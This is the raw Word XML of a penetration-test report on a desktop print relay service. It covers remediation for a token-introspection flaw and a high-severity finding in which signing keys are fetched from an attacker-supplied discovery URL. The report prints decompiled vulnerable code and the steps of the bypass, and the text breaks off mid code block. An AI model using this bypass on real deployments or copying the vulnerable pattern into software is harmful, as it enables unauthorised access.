    <w:p w14:paraId="60196B71" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "Okta": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "Issuer": "https://YOUR_TENANT.okta.com/oauth2/default",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "Audience": "api://print-relay",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "JwksUri": "https://YOUR_TENANT.okta.com/oauth2/default/v1/keys"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BC81C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Validate the token locally against the tenant JWKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278AFE3" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Replace the network "introspection" call with standard JWT validation using the pinned issuer, audience, and signing keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B008FE1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reject the token if any check fails — signature, issuer, audience, or expiry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C5A50" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>var tv = new TokenValidationParameters {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ValidateIssuer = true,            ValidIssuer   = cfg["Okta:Issuer"],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ValidateAudience = true,          ValidAudience = cfg["Okta:Audience"],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ValidateLifetime = true,          ClockSkew = TimeSpan.FromMinutes(2),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ValidateIssuerSigningKey = true,  IssuerSigningKeys = await GetOktaSigningKeysAsync()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>var handler = new JwtSecurityTokenHandler();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>var principal = handler.ValidateToken(accessToken, tv, out _);  // throws if invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41BC61" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. If you must keep network introspection, verify the response correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E49EE4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Treat the token as valid ONLY when the response body contains active == true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB07FE0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Treat any non-200 status, network error, parse error, or missing "active" field as INVALID (deny-by-default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47266F58" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>if (!resp.IsSuccessStatusCode) return false;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>var doc = JsonConvert.DeserializeObject&lt;IntrospectResponse&gt;(body);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>return doc != null &amp;&amp; doc.Active == true;   // not "no error" — must be explicitly active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A5AF0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Pin outbound traffic to the tenant only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF661A" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Restrict egress so the relay can only reach the known Okta host(s), preventing any attacker-influenced destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CE722" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) a request with X-ProviderValidationUrl pointing to an attacker host is rejected; (2) a forged/empty token returns 401; (3) a genuine Okta token still prints; (4) an expired token is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198BEE94" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="284C5479" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13515BFC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-287: Improper Authentication — cwe.mitre.org/data/definitions/287.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342849A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-290: Authentication Bypass by Spoofing — cwe.mitre.org/data/definitions/290.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E5C850" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A07: Identification and Authentication Failures — owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4259AA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RFC 7662: OAuth 2.0 Token Introspection — datatracker.ietf.org/doc/html/rfc7662</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7695DD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336" w:rsidP="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1368077D" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7F15ED" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43069BAB" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159" w:rsidP="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>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0CABBE7" w14:textId="77777777" w:rsidTr="002048E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13602797" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Toc232079911"/>
            <w:r>
              <w:t>2. Authentication Bypass via Attacker-Controlled OpenID Connect Discovery (B2C Validation Path) - High</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ADB7956"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C973081" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CCFC8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Rating: </w:t>
      </w:r>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 8.8 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C07E6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="80" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:r>
        <w:t>PrintController.IsB2CTokenValid, reached from PrintController.isUserTokenValid — endpoints POST /printers/print/pdfWithCopies and POST /printers/{printDocType}/print/zpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537A6AD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>isUserTokenValid branches on the caller-supplied X-ProviderValidationUrl header. When the URL contains the substring “okta” (case-insensitive) it uses the token-introspection path described in Finding 1; otherwise it falls through to IsB2CTokenValid, which is itself a complete authentication bypass. Because the only condition for reaching this branch is the absence of “okta” in an attacker-controlled header, an attacker selects it at will.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301DD17" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IsB2CTokenValid derives its entire trust anchor from attacker-controlled input. It retrieves the OpenID Connect discovery document (issuer and JWKS signing keys) from the attacker-supplied URL, then sets ValidIssuer to the issuer that document declares, IssuerSigningKeys to that document’s keys, and ValidAudience to the attacker-supplied X-ClientSecretJwt header value. Although ValidateIssuer, ValidateAudience, ValidateIssuerSigningKey, and ValidateLifetime are all enabled, every value they are compared against is chosen by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B9592" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker therefore signs a JWT with their own private key, publishes the matching public key in a JWKS referenced by their discovery document, sets the token’s aud to match the value they pass in X-ClientSecretJwt, and the relay accepts the token as authentic. This branch needs no “okta” trick and yields a cryptographically valid token, making it more reliable than the introspection bypass in Finding 1. Because the service applies a permissive Cross-Origin Resource Sharing policy (see related finding), the bypass is reachable cross-origin from any website the authenticated user visits; the loopback-bound listener is contacted from the victim’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5D031" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340AC97" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329C697" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B46F5D"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292131D5" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79817332" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D358E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IsB2CTokenValid()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C741C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>b2cMetadataUrl / OpenID discovery document URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF22D3" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>X-ProviderValidationUrl header → OpenID Connect discovery endpoint (attacker-supplied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD7CB85" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7A978" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>var metadata = client.GetStringAsync(b2cMetadataUrl).Result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D5FF8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7A535" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private bool IsB2CTokenValid(string b2cMetadataUrl, string token)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // VULNERABLE: Fetches OpenID metadata from attacker-supplied URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    var metadata = client.GetStringAsync(b2cMetadataUrl).Result;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    var jwkSet = JsonConvert.DeserializeObject&lt;JwkSet&gt;(metadata);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    var handler = new JwtSecurityTokenHandler();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    handler.ValidateToken(token, new TokenValidationParameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // VULNERABLE: Uses signing keys from attacker's metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        IssuerSigningKeyResolver = (t, st, kid, p) =&gt; jwkSet.Keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B899C40" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="593C0D5A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed logic of PrintController.IsB2CTokenValid (decompiled from IL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9282F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E781E4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4DC33C" wp14:editId="34479024">
            <wp:extent cx="5943600" cy="41064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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4106487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="646EFA8B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure F2 — Attack path: the attacker hosts the very directory of "trusted" signing keys that the service uses to validate the attacker's own self-signed pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E83EF" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="46682EB5" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D4A927" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var config = await new ConfigurationManager&lt;OpenIdConnectConfiguration&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69F703" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        providerValidationUrl,                       // attacker-controlled discovery URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E36109E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        new OpenIdConnectConfigurationRetriever()).GetConfigurationAsync();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B287821" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var tvp = new TokenValidationParameters {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A957835" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
